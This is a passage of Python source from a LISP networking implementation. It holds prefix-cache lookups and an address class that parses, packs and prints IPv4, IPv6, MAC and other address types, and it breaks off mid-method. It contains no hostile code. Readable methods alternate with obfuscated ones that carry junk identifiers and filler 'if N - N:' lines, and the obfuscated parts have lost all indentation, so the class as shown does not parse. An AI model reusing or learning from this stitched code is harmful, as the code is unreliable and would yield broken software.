            if (mask_key not in self.cache): return (None)
            if (key not in self.cache[mask_key].entries): return (None)
            return (self.cache[mask_key].entries[key])

        best = None
        for bucket_key in self.cache_sorted:
            # Buckets are sorted shortest-first; stop once past our length.
            if (mask_key < bucket_key): return (best)
            for entry_key in self.cache[bucket_key].entries_sorted:
                entries = self.cache[bucket_key].entries
                if (entry_key in entries):
                    entry = entries[entry_key]
                    if (entry == None): continue
                    if (prefix.is_more_specific(entry.eid)): best = entry
        return (best)

    def delete_cache(self, prefix):
        """Remove the entry for 'prefix' if present."""
        mask_key, key = self.build_key(prefix)
        if (mask_key not in self.cache): return
        if (key not in self.cache[mask_key].entries): return
        self.cache[mask_key].entries.pop(key)
        self.cache[mask_key].entries_sorted.remove(key)
        self.cache_count -= 1

    def walk_cache(self, function, parms):
        """Call function(entry, parms) for each entry in sorted order.
        The callback returns (keep_going, parms); a False keep_going
        stops the walk early.  Returns the final parms."""
        for mask_key in self.cache_sorted:
            for key in self.cache[mask_key].entries_sorted:
                entry = self.cache[mask_key].entries[key]
                keep_going, parms = function(entry, parms)
                if (keep_going == False): return (parms)
        return (parms)

    def print_cache(self):
        """Log the full cache contents via lprint()."""
        lprint("Printing contents of {}: ".format(self))
        if (self.cache_size() == 0):
            lprint("  Cache is empty")
            return

        for mask_key in self.cache_sorted:
            for key in self.cache[mask_key].entries_sorted:
                entry = self.cache[mask_key].entries[key]
                lprint("  Mask-length: {}, key: {}, entry: {}".format(
                    mask_key, key, entry))
#
# Global prefix caches, all instances of lisp_cache.
#
lisp_referral_cache = lisp_cache()   # map-resolver referrals
lisp_ddt_cache = lisp_cache()        # DDT delegations
lisp_sites_by_eid = lisp_cache()     # map-server site registrations
lisp_map_cache = lisp_cache()        # data-plane map-cache
lisp_db_for_lookups = lisp_cache()   # local database-mappings
def lisp_map_cache_lookup(source, dest):
    """Longest-match 'dest' in the global map-cache; for multicast
    destinations also match 'source' in the entry's source cache.
    Returns the map-cache entry or None.  Logs the outcome via dprint().
    """
    multicast = dest.is_multicast_address()

    #
    # First-stage lookup on the destination EID/group.
    #
    mc = lisp_map_cache.lookup_cache(dest, False)
    if (mc == None):
        eid_str = source.print_sg(dest) if multicast else dest.print_address()
        eid_str = green(eid_str, False)
        dprint("Lookup for EID {} not found in map-cache".format(eid_str))
        return (None)

    #
    # Unicast destination: first stage is the answer.
    #
    if (multicast == False):
        mc_str = green(mc.eid.print_prefix(), False)
        dprint("Lookup for EID {} found map-cache entry {}".format(
            green(dest.print_address(), False), mc_str))
        return (mc)

    #
    # Multicast: second-stage (S,G) lookup on the source.
    #
    mc = mc.lookup_source_cache(source, False)
    if (mc == None):
        eid_str = source.print_sg(dest)
        dprint("Lookup for EID {} not found in map-cache".format(eid_str))
        return (None)

    mc_str = green(mc.print_eid_tuple(), False)
    dprint("Lookup for EID {} found map-cache entry {}".format(
        green(source.print_sg(dest), False), mc_str))
    return (mc)
def lisp_referral_cache_lookup(eid, group, exact):
    """Look up (eid, group) in the global referral cache.

    Unicast (null group): single-stage lookup on 'eid'.  Multicast:
    look up 'group' first, then 'eid' in that entry's source cache.
    With 'exact' set, only a two-stage exact hit is returned.
    """
    if (group and group.is_null()):
        referral = lisp_referral_cache.lookup_cache(eid, exact)
        return (referral)

    #
    # (S,G) lookup - need both a source and a group.
    #
    if (eid == None or eid.is_null()): return (None)

    referral = lisp_referral_cache.lookup_cache(group, exact)
    if (referral == None): return (None)

    source_referral = referral.lookup_source_cache(eid, exact)
    if (source_referral): return (source_referral)

    # On exact lookups a group-only hit does not count.
    if (exact): referral = None
    return (referral)
def lisp_ddt_cache_lookup(eid, group, exact):
    """Look up (eid, group) in the global DDT cache.

    Unicast (null group): single-stage lookup on 'eid'.  Multicast:
    look up 'group' first, then 'eid' in that entry's source cache.
    With 'exact' set, only a two-stage exact hit is returned.
    """
    if (group.is_null()):
        ddt_entry = lisp_ddt_cache.lookup_cache(eid, exact)
        return (ddt_entry)

    #
    # (S,G) lookup - need a source as well as the group.
    #
    if (eid.is_null()): return (None)

    ddt_entry = lisp_ddt_cache.lookup_cache(group, exact)
    if (ddt_entry == None): return (None)

    source_entry = ddt_entry.lookup_source_cache(eid, exact)
    if (source_entry): return (source_entry)

    # On exact lookups a group-only hit does not count.
    if (exact): ddt_entry = None
    return (ddt_entry)
def lisp_site_eid_lookup(eid, group, exact):
    """Look up (eid, group) in the map-server site-EID table.

    Unicast (null group): single-stage lookup on 'eid'.  Multicast:
    look up 'group' first, then 'eid' in the entry's source cache.  For
    non-exact multicast misses, fall back to an accepting
    parent-for-more-specifics entry when the group is covered by it.
    """
    if (group.is_null()):
        site_eid = lisp_sites_by_eid.lookup_cache(eid, exact)
        return (site_eid)

    #
    # (S,G) lookup - need a source as well as the group.
    #
    if (eid.is_null()): return (None)

    site_eid = lisp_sites_by_eid.lookup_cache(group, exact)
    if (site_eid == None): return (None)

    source_site = site_eid.lookup_source_cache(eid, exact)
    if (source_site): return (source_site)

    if (exact):
        site_eid = None
    else:
        # NOTE(review): falls back to the parent entry when it accepts
        # more-specifics and covers this group.
        parent = site_eid.parent_for_more_specifics
        if (parent and parent.accept_more_specifics):
            if (group.is_more_specific(parent.group)): site_eid = parent
    return (site_eid)
class lisp_address ( ) :
def __init__ ( self , afi , addr_str , mask_len , iid ) :
self . afi = afi
self . mask_len = mask_len
self . instance_id = iid
self . iid_list = [ ]
self . address = 0
if ( addr_str != "" ) : self . store_address ( addr_str )
if 78 - 78: I1IiiI / i1IIi % II111iiii % I1IiiI % Ii1I
if 29 - 29: i1IIi % o0oOOo0O0Ooo + OOooOOo / Oo0Ooo
def copy_address ( self , addr ) :
if ( addr == None ) : return
self . afi = addr . afi
self . address = addr . address
self . mask_len = addr . mask_len
self . instance_id = addr . instance_id
self . iid_list = addr . iid_list
if 38 - 38: IiII . I1Ii111
if 69 - 69: ooOoO0o + OoOoOO00 + II111iiii % I1Ii111 + Ii1I . ooOoO0o
def make_default_route ( self , addr ) :
self . afi = addr . afi
self . instance_id = addr . instance_id
self . mask_len = 0
self . address = 0
if 73 - 73: I11i % I11i . ooOoO0o + OoOoOO00
if 33 - 33: i11iIiiIii . i11iIiiIii * i11iIiiIii / iIii1I11I1II1 / I1ii11iIi11i . ooOoO0o
def make_default_multicast_route(self, addr):
    """Turn self into the default multicast route for addr's
    address-family: 224.0.0.0/4, ff00::/8, or the all-ones MAC /48.
    The AFI and instance-id are copied from addr."""
    self.afi = addr.afi
    self.instance_id = addr.instance_id
    if (self.afi == LISP_AFI_IPV4):
        self.address = 0xe0000000
        self.mask_len = 4
    if (self.afi == LISP_AFI_IPV6):
        self.address = 0xff << 120
        self.mask_len = 8
    if (self.afi == LISP_AFI_MAC):
        self.address = 0xffffffffffff
        self.mask_len = 48
def not_set(self):
    """True when no address-family has been assigned yet."""
    return (self.afi == LISP_AFI_NONE)
def is_private_address(self):
    """True for RFC 1918 IPv4 addresses (10/8, 172.16/12, 192.168/16);
    False for anything that is not IPv4."""
    if (self.is_ipv4() == False): return (False)
    addr = self.address
    if (((addr & 0xff000000) >> 24) == 10): return (True)
    if (((addr & 0xff000000) >> 24) == 172):
        second_octet = (addr & 0x00ff0000) >> 16
        if (second_octet >= 16 and second_octet <= 31): return (True)
    if (((addr & 0xffff0000) >> 16) == 0xc0a8): return (True)
    return (False)
def is_multicast_address(self):
    """True when the address is IPv4, IPv6, or MAC multicast."""
    if (self.is_ipv4()): return (self.is_ipv4_multicast())
    if (self.is_ipv6()): return (self.is_ipv6_multicast())
    if (self.is_mac()): return (self.is_mac_multicast())
    return (False)
def host_mask_len(self):
    """Return the host-route (full-length) mask length in bits for
    this AFI; 0 for unknown AFIs."""
    if (self.afi == LISP_AFI_IPV4): return (LISP_IPV4_HOST_MASK_LEN)
    if (self.afi == LISP_AFI_IPV6): return (LISP_IPV6_HOST_MASK_LEN)
    if (self.afi == LISP_AFI_MAC): return (LISP_MAC_HOST_MASK_LEN)
    if (self.afi == LISP_AFI_E164): return (LISP_E164_HOST_MASK_LEN)
    if (self.afi == LISP_AFI_NAME): return (len(self.address) * 8)
    if (self.afi == LISP_AFI_GEO_COORD):
        return (len(self.address.print_geo()) * 8)
    return (0)
def is_iana_eid(self):
    """True for IPv6 addresses inside the IANA 2001:5::/32 EID block."""
    if (self.is_ipv6() == False): return (False)
    top_bits = self.address >> 96
    return (top_bits == 0x20010005)
def addr_length(self):
    """Return the encoded address length in bytes for this AFI;
    0 for LCAF and unknown AFIs."""
    if (self.afi == LISP_AFI_IPV4): return (4)
    if (self.afi == LISP_AFI_IPV6): return (16)
    if (self.afi == LISP_AFI_MAC): return (6)
    if (self.afi == LISP_AFI_E164): return (8)
    if (self.afi == LISP_AFI_LCAF): return (0)
    if (self.afi == LISP_AFI_NAME): return (len(self.address) + 1)
    if (self.afi == LISP_AFI_IID_RANGE): return (4)
    if (self.afi == LISP_AFI_GEO_COORD):
        return (len(self.address.print_geo()))
    return (0)
def afi_to_version(self):
    """Map the AFI to an IP protocol version: 4, 6, or 0 for non-IP."""
    if (self.afi == LISP_AFI_IPV4): return (4)
    if (self.afi == LISP_AFI_IPV6): return (6)
    return (0)
def packet_format(self):
    """Return the struct format string used to pack/unpack this AFI's
    address (big values are split into 64/32/16-bit words); "" for
    AFIs packed by hand."""
    if (self.afi == LISP_AFI_IPV4): return ("I")
    if (self.afi == LISP_AFI_IPV6): return ("QQ")
    if (self.afi == LISP_AFI_MAC): return ("HHH")
    if (self.afi == LISP_AFI_E164): return ("II")
    if (self.afi == LISP_AFI_LCAF): return ("I")
    return ("")
def pack_address(self):
    """Pack self.address into wire format and return the byte string.
    IPv4 is stored in network byte order; IPv6 as two byte-swapped
    64-bit halves; MAC as three 16-bit words; E.164 as two 32-bit
    words; distinguished-names as a NUL-terminated string."""
    packet_format = self.packet_format()
    packet = ""
    if (self.is_ipv4()):
        packet = struct.pack(packet_format, socket.htonl(self.address))
    elif (self.is_ipv6()):
        upper = byte_swap_64(self.address >> 64)
        lower = byte_swap_64(self.address & 0xffffffffffffffff)
        packet = struct.pack(packet_format, upper, lower)
    elif (self.is_mac()):
        addr = self.address
        word0 = (addr >> 32) & 0xffff
        word1 = (addr >> 16) & 0xffff
        word2 = addr & 0xffff
        packet = struct.pack(packet_format, word0, word1, word2)
    elif (self.is_e164()):
        addr = self.address
        upper = (addr >> 32) & 0xffffffff
        lower = (addr & 0xffffffff)
        packet = struct.pack(packet_format, upper, lower)
    elif (self.is_dist_name()):
        packet += self.address + "\0"
    return (packet)
def unpack_address(self, packet):
    """Unpack an address of this AFI from the front of 'packet' into
    self.address and return the remaining packet bytes, or None when
    the packet is too short."""
    packet_format = self.packet_format()
    format_size = struct.calcsize(packet_format)
    if (len(packet) < format_size): return (None)

    addr = struct.unpack(packet_format, packet[:format_size])

    if (self.is_ipv4()):
        self.address = socket.ntohl(addr[0])

    elif (self.is_ipv6()):
        # NOTE(review): when the first 64-bit word is small with a zero
        # low byte it is treated as an already-swapped compressed form
        # and shifted into place rather than byte-swapped - presumably
        # to round-trip addresses like fe80:: correctly; confirm against
        # the packing side.
        if (addr[0] <= 0xffff and (addr[0] & 0xff) == 0):
            upper = (addr[0] << 48) << 64
        else:
            upper = byte_swap_64(addr[0]) << 64

        lower = byte_swap_64(addr[1])
        self.address = upper | lower

    elif (self.is_mac()):
        word0 = addr[0]
        word1 = addr[1]
        word2 = addr[2]
        self.address = (word0 << 32) + (word1 << 16) + word2

    elif (self.is_e164()):
        self.address = (addr[0] << 32) + addr[1]

    elif (self.is_dist_name()):
        packet, self.address = lisp_decode_dist_name(packet)
        self.mask_len = len(self.address) * 8
        format_size = 0   # dist-name consumed its own bytes above

    packet = packet[format_size::]
    return (packet)
def is_ipv4(self):
    """True when this address is AFI IPv4."""
    return (self.afi == LISP_AFI_IPV4)
def is_ipv4_link_local(self):
    """True for IPv4 169.254/16 link-local addresses."""
    if (self.is_ipv4() == False): return (False)
    top16 = (self.address >> 16) & 0xffff
    return (top16 == 0xa9fe)
def is_ipv4_loopback(self):
    """True when the address is exactly 127.0.0.1."""
    if (self.is_ipv4() == False): return (False)
    return (self.address == 0x7f000001)
def is_ipv4_multicast(self):
    """True for IPv4 class-D (224/4) multicast addresses."""
    if (self.is_ipv4() == False): return (False)
    first_octet = (self.address >> 24) & 0xf0
    return (first_octet == 0xe0)
def is_ipv4_string ( self , addr_str ) :
return ( addr_str . find ( "." ) != - 1 )
if 77 - 77: I11i + i1IIi * OoOoOO00 % OoooooooOO
if 56 - 56: I1Ii111 * i1IIi % i11iIiiIii
def is_ipv6(self):
    """True when this address is AFI IPv6."""
    return (self.afi == LISP_AFI_IPV6)
def is_ipv6_link_local(self):
    """True for IPv6 fe80::/16 link-local addresses."""
    if (self.is_ipv6() == False): return (False)
    top16 = (self.address >> 112) & 0xffff
    return (top16 == 0xfe80)
def is_ipv6_string_link_local ( self , addr_str ) :
return ( addr_str . find ( "fe80::" ) != - 1 )
if 1 - 1: i1IIi * iIii1I11I1II1
if 29 - 29: I11i
def is_ipv6_loopback(self):
    """True when the address is exactly ::1."""
    if (self.is_ipv6() == False): return (False)
    return (self.address == 1)
def is_ipv6_multicast(self):
    """True for IPv6 ff00::/8 multicast addresses."""
    if (self.is_ipv6() == False): return (False)
    first_byte = (self.address >> 120) & 0xff
    return (first_byte == 0xff)
def is_ipv6_string ( self , addr_str ) :
return ( addr_str . find ( ":" ) != - 1 )
if 9 - 9: OOooOOo / OoooooooOO + iII111i
if 52 - 52: IiII / OOooOOo * iIii1I11I1II1 + o0oOOo0O0Ooo
def is_mac(self):
    """True when this address is AFI MAC."""
    return (self.afi == LISP_AFI_MAC)
def is_mac_multicast(self):
    """True when the MAC group bit (first transmitted bit) is set."""
    if (self.is_mac() == False): return (False)
    return ((self.address & 0x010000000000) != 0)
def is_mac_broadcast(self):
    """True when the address is the all-ones broadcast MAC."""
    if (self.is_mac() == False): return (False)
    return (self.address == 0xffffffffffff)
def is_mac_string ( self , addr_str ) :
return ( len ( addr_str ) == 15 and addr_str . find ( "-" ) != - 1 )
if 25 - 25: ooOoO0o % o0oOOo0O0Ooo - i11iIiiIii
if 79 - 79: iII111i - I1IiiI % O0 / Oo0Ooo + OoOoOO00 . Oo0Ooo
def is_link_local_multicast(self):
    """True for link-local-scope multicast: IPv4 224.0.0/24 or IPv6
    ff02::/16; False for other AFIs."""
    if (self.is_ipv4()):
        return ((0xe0ffff00 & self.address) == 0xe0000000)
    if (self.is_ipv6()):
        return ((self.address >> 112) & 0xffff == 0xff02)
    return (False)
def is_null(self):
    """True when this address has AFI none."""
    return (self.afi == LISP_AFI_NONE)
def is_ultimate_root(self):
    """True when this is the ultimate-root ("[*]") pseudo-AFI."""
    return (self.afi == LISP_AFI_ULTIMATE_ROOT)
def is_iid_range(self):
    """True when this is an instance-id-range pseudo-AFI."""
    return (self.afi == LISP_AFI_IID_RANGE)
def is_e164(self):
    """True when this address is AFI E.164 (phone number)."""
    return (self.afi == LISP_AFI_E164)
def is_dist_name(self):
    """True when this address is a distinguished-name string."""
    return (self.afi == LISP_AFI_NAME)
def is_geo_prefix(self):
    """True when this address is a geo-coordinate LCAF."""
    return (self.afi == LISP_AFI_GEO_COORD)
def is_binary(self):
    """True when the address is a numeric value (everything except
    distinguished-names and geo-prefixes, which are objects/strings)."""
    return (not (self.is_dist_name() or self.is_geo_prefix()))
def store_address(self, addr_str):
    """Parse printable addr_str into self.address for this AFI (the AFI
    is inferred first when unset).  A leading "[<iid>]" sets the
    instance-id.  Also sets mask_len to the host mask length."""
    if (self.afi == LISP_AFI_NONE): self.string_to_afi(addr_str)

    #
    # Strip an optional "[<instance-id>]" prefix.
    #
    left = addr_str.find("[")
    right = addr_str.find("]")
    if (left != -1 and right != -1):
        self.instance_id = int(addr_str[left+1:right])
        addr_str = addr_str[right+1::]
        if (self.is_dist_name() == False):
            addr_str = addr_str.replace(" ", "")

    if (self.is_ipv4()):
        octets = addr_str.split(".")
        value = int(octets[0]) << 24
        value += int(octets[1]) << 16
        value += int(octets[2]) << 8
        value += int(octets[3])
        self.address = value
    elif (self.is_ipv6()):
        # NOTE(review): when bytes 3-4 are "::" the hexlified string has
        # its first two byte-pairs swapped back - presumably to undo an
        # inet_pton quirk for short leading groups; confirm with
        # pack/unpack round-trips.
        reswap = (addr_str[2:4] == "::")
        try:
            addr_str = socket.inet_pton(socket.AF_INET6, addr_str)
        except:
            # Best-effort: treat an unparsable string as ::
            addr_str = socket.inet_pton(socket.AF_INET6, "0::0")

        addr_str = binascii.hexlify(addr_str)

        if (reswap):
            addr_str = addr_str[2:4] + addr_str[0:2] + addr_str[4::]

        self.address = int(addr_str, 16)
    elif (self.is_geo_prefix()):
        geo = lisp_geo(None)
        geo.name = "geo-prefix-{}".format(geo)
        geo.parse_geo_string(addr_str)
        self.address = geo
    elif (self.is_mac()):
        addr_str = addr_str.replace("-", "")
        self.address = int(addr_str, 16)
    elif (self.is_e164()):
        addr_str = addr_str[1::]          # strip leading "+"
        self.address = int(addr_str, 16) << 4
    elif (self.is_dist_name()):
        self.address = addr_str.replace("'", "")

    self.mask_len = self.host_mask_len()
def store_prefix(self, prefix_str):
    """Parse "<addr>/<mask-len>" (or a geo-string / quoted
    distinguished-name, whose lengths are implicit) into self."""
    if (self.is_geo_string(prefix_str)):
        index = prefix_str.find("]")
        mask_len = len(prefix_str[index+1::]) * 8
    elif (prefix_str.find("/") != -1):
        prefix_str, mask_len = prefix_str.split("/")
    else:
        left_quote = prefix_str.find("'")
        if (left_quote == -1): return
        right_quote = prefix_str.find("'", left_quote+1)
        if (right_quote == -1): return
        mask_len = len(prefix_str[left_quote+1:right_quote]) * 8

    self.string_to_afi(prefix_str)
    self.store_address(prefix_str)
    self.mask_len = int(mask_len)
def zero_host_bits(self):
    """Clear all address bits below the prefix mask length."""
    if (self.mask_len < 0): return
    mask = (2 ** self.mask_len) - 1
    host_bits = self.addr_length() * 8 - self.mask_len
    self.address &= mask << host_bits
def is_geo_string ( self , addr_str ) :
ooo = addr_str . find ( "]" )
if ( ooo != - 1 ) : addr_str = addr_str [ ooo + 1 : : ]
if 2 - 2: o0oOOo0O0Ooo
iiIi1ii1IiI = addr_str . split ( "/" )
if ( len ( iiIi1ii1IiI ) == 2 ) :
if ( iiIi1ii1IiI [ 1 ] . isdigit ( ) == False ) : return ( False )
if 86 - 86: OoooooooOO * I1ii11iIi11i + O0 + o0oOOo0O0Ooo + OOooOOo % OoO0O00
iiIi1ii1IiI = iiIi1ii1IiI [ 0 ]
iiIi1ii1IiI = iiIi1ii1IiI . split ( "-" )
o0o0O0O0Oooo0 = len ( iiIi1ii1IiI )
if ( o0o0O0O0Oooo0 < 8 or o0o0O0O0Oooo0 > 9 ) : return ( False )
if 34 - 34: I1IiiI + i1IIi . II111iiii . O0
for OOOi1II11i111 in range ( 0 , o0o0O0O0Oooo0 ) :
if ( OOOi1II11i111 == 3 ) :
if ( iiIi1ii1IiI [ OOOi1II11i111 ] in [ "N" , "S" ] ) : continue
return ( False )
if 11 - 11: Ii1I
if ( OOOi1II11i111 == 7 ) :
if ( iiIi1ii1IiI [ OOOi1II11i111 ] in [ "W" , "E" ] ) : continue
return ( False )
if 35 - 35: i11iIiiIii + ooOoO0o
if ( iiIi1ii1IiI [ OOOi1II11i111 ] . isdigit ( ) == False ) : return ( False )
if 82 - 82: OoooooooOO % O0 + iIii1I11I1II1
return ( True )
if 100 - 100: OoooooooOO + I11i - OoOoOO00 + Ii1I + I1Ii111 * iIii1I11I1II1
if 55 - 55: I1Ii111
def string_to_afi(self, addr_str):
    """Infer and set self.afi from the printable form of addr_str:
    'name' quoting, ":" IPv6, "." IPv4, "+" E.164, geo-string, "-" MAC,
    otherwise none.  Order matters - geo-strings also contain dashes."""
    if (addr_str.count("'") == 2):
        self.afi = LISP_AFI_NAME
        return
    if (addr_str.find(":") != -1): self.afi = LISP_AFI_IPV6
    elif (addr_str.find(".") != -1): self.afi = LISP_AFI_IPV4
    elif (addr_str.find("+") != -1): self.afi = LISP_AFI_E164
    elif (self.is_geo_string(addr_str)): self.afi = LISP_AFI_GEO_COORD
    elif (addr_str.find("-") != -1): self.afi = LISP_AFI_MAC
    else: self.afi = LISP_AFI_NONE
def print_address ( self ) :
IiiIIi1 = self . print_address_no_iid ( )
o0OoO0000o = "[" + str ( self . instance_id )
for IiIIi1IiiIiI in self . iid_list : o0OoO0000o += "," + str ( IiIIi1IiiIiI )
o0OoO0000o += "]"
IiiIIi1 = "{}{}" . format ( o0OoO0000o , IiiIIi1 )
return ( IiiIIi1 )
if 80 - 80: I1ii11iIi11i + II111iiii % Oo0Ooo - o0oOOo0O0Ooo
if 1 - 1: iII111i - OoOoOO00
def print_address_no_iid ( self ) :
if ( self . is_ipv4 ( ) ) :
IiiIIi1 = self . address
IiiIiiI = IiiIIi1 >> 24
Ii1II = ( IiiIIi1 >> 16 ) & 0xff
OoIIiiI1II = ( IiiIIi1 >> 8 ) & 0xff
OOOoo0O0 = IiiIIi1 & 0xff
return ( "{}.{}.{}.{}" . format ( IiiIiiI , Ii1II , OoIIiiI1II , OOOoo0O0 ) )
elif ( self . is_ipv6 ( ) ) :
oo0o00OO = lisp_hex_string ( self . address ) . zfill ( 32 )
oo0o00OO = binascii . unhexlify ( oo0o00OO )
oo0o00OO = socket . inet_ntop ( socket . AF_INET6 , oo0o00OO )
return ( "{}" . format ( oo0o00OO ) )
elif ( self . is_geo_prefix ( ) ) :
return ( "{}" . format ( self . address . print_geo ( ) ) )
elif ( self . is_mac ( ) ) :
oo0o00OO = lisp_hex_string ( self . address ) . zfill ( 12 )
oo0o00OO = "{}-{}-{}" . format ( oo0o00OO [ 0 : 4 ] , oo0o00OO [ 4 : 8 ] ,
oo0o00OO [ 8 : 12 ] )
return ( "{}" . format ( oo0o00OO ) )
elif ( self . is_e164 ( ) ) :
oo0o00OO = lisp_hex_string ( self . address ) . zfill ( 15 )
return ( "+{}" . format ( oo0o00OO ) )
elif ( self . is_dist_name ( ) ) :
return ( "'{}'" . format ( self . address ) )
elif ( self . is_null ( ) ) :
return ( "no-address" )
if 25 - 25: o0oOOo0O0Ooo
return ( "unknown-afi:{}" . format ( self . afi ) )
if 29 - 29: I1Ii111
if 58 - 58: i1IIi / I1ii11iIi11i
def print_prefix ( self ) :
if ( self . is_ultimate_root ( ) ) : return ( "[*]" )
if ( self . is_iid_range ( ) ) :
if ( self . mask_len == 32 ) : return ( "[{}]" . format ( self . instance_id ) )
Iii1iI1IIi = self . instance_id + ( 2 ** ( 32 - self . mask_len ) - 1 )
return ( "[{}-{}]" . format ( self . instance_id , Iii1iI1IIi ) )
if 39 - 39: iII111i / I11i
IiiIIi1 = self . print_address ( )
if ( self . is_dist_name ( ) ) : return ( IiiIIi1 )
if ( self . is_geo_prefix ( ) ) : return ( IiiIIi1 )
if 67 - 67: i1IIi
ooo = IiiIIi1 . find ( "no-address" )
if ( ooo == - 1 ) :
IiiIIi1 = "{}/{}" . format ( IiiIIi1 , str ( self . mask_len ) )
else :
IiiIIi1 = IiiIIi1 [ 0 : ooo ]
if 1 - 1: OoOoOO00 * O0 + i11iIiiIii . ooOoO0o / OoO0O00
return ( IiiIIi1 )
if 48 - 48: o0oOOo0O0Ooo * II111iiii
if 17 - 17: o0oOOo0O0Ooo / ooOoO0o + i1IIi
def print_prefix_no_iid ( self ) :
IiiIIi1 = self . print_address_no_iid ( )
if ( self . is_dist_name ( ) ) : return ( IiiIIi1 )
if ( self . is_geo_prefix ( ) ) : return ( IiiIIi1 )
return ( "{}/{}" . format ( IiiIIi1 , str ( self . mask_len ) ) )
if 78 - 78: iIii1I11I1II1 * o0oOOo0O0Ooo * Oo0Ooo - OoO0O00 / OoO0O00
if 89 - 89: o0oOOo0O0Ooo % o0oOOo0O0Ooo
def print_prefix_url ( self ) :
if ( self . is_ultimate_root ( ) ) : return ( "0--0" )
IiiIIi1 = self . print_address ( )
ooo = IiiIIi1 . find ( "]" )
if ( ooo != - 1 ) : IiiIIi1 = IiiIIi1 [ ooo + 1 : : ]
if ( self . is_geo_prefix ( ) ) :
IiiIIi1 = IiiIIi1 . replace ( "/" , "-" )
return ( "{}-{}" . format ( self . instance_id , IiiIIi1 ) )
if 8 - 8: Ii1I % oO0o - o0oOOo0O0Ooo
return ( "{}-{}-{}" . format ( self . instance_id , IiiIIi1 , self . mask_len ) )
if 14 - 14: OOooOOo * IiII
if 15 - 15: o0oOOo0O0Ooo + OoooooooOO - OOooOOo - o0oOOo0O0Ooo . iIii1I11I1II1 / Ii1I
def print_sg ( self , g ) :
IiII1iiI = self . print_prefix ( )
i1I111 = IiII1iiI . find ( "]" ) + 1
g = g . print_prefix ( )
O0o0 = g . find ( "]" ) + 1
II11I = "[{}]({}, {})" . format ( self . instance_id , IiII1iiI [ i1I111 : : ] , g [ O0o0 : : ] )
return ( II11I )
if 35 - 35: I1IiiI * OoO0O00 - iII111i . Ii1I + ooOoO0o
if 81 - 81: OOooOOo / OoooooooOO . I1IiiI % OoO0O00 % I1Ii111 / ooOoO0o
def hash_address ( self , addr ) :
Ii1iiI1i1 = self . address
iIi = addr . address
if 53 - 53: O0 / I1ii11iIi11i . OoooooooOO
if ( self . is_geo_prefix ( ) ) : Ii1iiI1i1 = self . address . print_geo ( )
if ( addr . is_geo_prefix ( ) ) : iIi = addr . address . print_geo ( )
if 35 - 35: OoOoOO00 - OOooOOo + OoOoOO00 % OoooooooOO . oO0o
if ( type ( Ii1iiI1i1 ) == str ) :
Ii1iiI1i1 = int ( binascii . hexlify ( Ii1iiI1i1 [ 0 : 1 ] ) )
if 61 - 61: I11i / o0oOOo0O0Ooo / OoO0O00
if ( type ( iIi ) == str ) :
iIi = int ( binascii . hexlify ( iIi [ 0 : 1 ] ) )
if 17 - 17: o0oOOo0O0Ooo * OoO0O00 + I11i + oO0o % OoOoOO00 - Oo0Ooo
return ( Ii1iiI1i1 ^ iIi )
if 63 - 63: i11iIiiIii % I11i
if 64 - 64: oO0o + I11i / i1IIi * OoO0O00
if 19 - 19: O0 . O0
if 13 - 13: i11iIiiIii - i11iIiiIii . iIii1I11I1II1 - O0 . I11i / i11iIiiIii
if 59 - 59: ooOoO0o + I1ii11iIi11i . OoO0O00 . O0
if 45 - 45: O0 . o0oOOo0O0Ooo + OoOoOO00 / I1ii11iIi11i + Ii1I % I1Ii111
def is_more_specific ( self , prefix ) :
if ( prefix . afi == LISP_AFI_ULTIMATE_ROOT ) : return ( True )
if 20 - 20: Oo0Ooo
iIi1iii1 = prefix . mask_len
if ( prefix . afi == LISP_AFI_IID_RANGE ) :
IIIIIiI1 = 2 ** ( 32 - iIi1iii1 )
iIii1i11iI1 = prefix . instance_id
Iii1iI1IIi = iIii1i11iI1 + IIIIIiI1
return ( self . instance_id in range ( iIii1i11iI1 , Iii1iI1IIi ) )
if 7 - 7: OoooooooOO % I1Ii111 * I1Ii111 - II111iiii - Ii1I
if 75 - 75: o0oOOo0O0Ooo / Oo0Ooo + oO0o
if ( self . instance_id != prefix . instance_id ) : return ( False )
if ( self . afi != prefix . afi ) :
if ( prefix . afi != LISP_AFI_NONE ) : return ( False )
if 67 - 67: IiII + OoooooooOO . i11iIiiIii - I1Ii111 . i11iIiiIii
if 70 - 70: OoO0O00 * OoooooooOO
if 52 - 52: Ii1I . iII111i / OoooooooOO
if 19 - 19: OOooOOo % o0oOOo0O0Ooo
if 23 - 23: I1Ii111 % iIii1I11I1II1 - ooOoO0o
if ( self . is_binary ( ) == False ) :
if ( prefix . afi == LISP_AFI_NONE ) : return ( True )
if ( type ( self . address ) != type ( prefix . address ) ) : return ( False )
IiiIIi1 = self . address
oOiII1i1 = prefix . address
if ( self . is_geo_prefix ( ) ) :
IiiIIi1 = self . address . print_geo ( )
oOiII1i1 = prefix . address . print_geo ( )
if 6 - 6: Oo0Ooo
if ( len ( IiiIIi1 ) < len ( oOiII1i1 ) ) : return ( False )
return ( IiiIIi1 . find ( oOiII1i1 ) == 0 )
if 9 - 9: Oo0Ooo - II111iiii - i1IIi - ooOoO0o / o0oOOo0O0Ooo * I1ii11iIi11i
if 29 - 29: ooOoO0o
if 65 - 65: i1IIi * ooOoO0o * I1IiiI
if 36 - 36: o0oOOo0O0Ooo - Ii1I + O0 + OOooOOo
if 11 - 11: I11i / OoooooooOO . I11i . II111iiii / oO0o - i11iIiiIii
if ( self . mask_len < iIi1iii1 ) : return ( False )
if 67 - 67: o0oOOo0O0Ooo . I1Ii111 % iIii1I11I1II1 / I1Ii111
IIiIiII = ( prefix . addr_length ( ) * 8 ) - iIi1iii1
oOoo00oOoO0o = ( 2 ** iIi1iii1 - 1 ) << IIiIiII
return ( ( self . address & oOoo00oOoO0o ) == prefix . address )
if 18 - 18: I11i * ooOoO0o
if 46 - 46: IiII
def mask_address ( self , mask_len ) :
IIiIiII = ( self . addr_length ( ) * 8 ) - mask_len
oOoo00oOoO0o = ( 2 ** mask_len - 1 ) << IIiIiII
self . address &= oOoo00oOoO0o
if 96 - 96: iII111i / i11iIiiIii + Oo0Ooo . I1IiiI + iII111i % OoOoOO00
if 19 - 19: i11iIiiIii . Oo0Ooo . OoOoOO00 - I1IiiI
def is_exact_match ( self , prefix ) :
if ( self . instance_id != prefix . instance_id ) : return ( False )
O00OooO0o = self . print_prefix ( )
oo00oO000oOo = prefix . print_prefix ( ) if prefix else ""
return ( O00OooO0o == oo00oO000oOo )
if 57 - 57: I1IiiI - ooOoO0o
if 70 - 70: I1ii11iIi11i * ooOoO0o
def is_local ( self ) :
if ( self . is_ipv4 ( ) ) :
IIIIIi = lisp_myrlocs [ 0 ]
if ( IIIIIi == None ) : return ( False )
IIIIIi = IIIIIi . print_address_no_iid ( )
